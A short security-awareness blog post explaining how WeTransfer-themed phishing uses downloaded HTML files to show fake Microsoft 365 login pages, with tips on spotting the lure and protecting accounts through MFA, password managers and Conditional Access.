HTML Attack

WeTransfer phishing is currently one of the most effective ways to compromise Microsoft 365 / OneDrive / Outlook accounts — because the flow looks normal: download link, open file, login.

In this post I break down a real incident (with the video embedded) and explain what actually happens and why an HTML file can be dangerous even when it looks harmless.

Why WeTransfer is used so often

WeTransfer is widely trusted. Attackers exploit that trust to increase clicks and reduce suspicion, compared to unknown file-hosting domains.

How the attack unfolds

You receive an email that looks like shared files, invoices, or documents. The link opens a download-style page. Instead of a PDF/DOCX, you download something like invoice.html or documents.html.

When you open it, your browser shows a convincing OneDrive/Microsoft login. Many people assume it’s a normal cloud authentication step — and enter their password.

Why the HTML file is the key risk

An HTML file is basically “a web page saved as a file”. When opened, it can render a fake login page, redirect you, or submit what you type to an attacker-controlled server. That’s why “opening a file” can suddenly turn into a credential theft moment.

How to spot it quickly

Check the browser address: is it a real Microsoft domain? Also ask: why is this .html instead of a document? If the message adds urgency (“expires soon”, “urgent”, “view now”), treat it as a strong warning sign.

How to protect your Microsoft 365 account

Enable MFA (Authenticator preferred), use a password manager, and review suspicious sign-ins. For businesses, consider Security Defaults or Conditional Access. And teach teams that “HTML file ≠ document”.

Video

The embedded video shows the incident flow and what to look for in real life.

Key takeaway: WeTransfer itself isn’t the threat. Attackers use the trusted download flow as camouflage. The danger starts when an HTML file triggers a login prompt.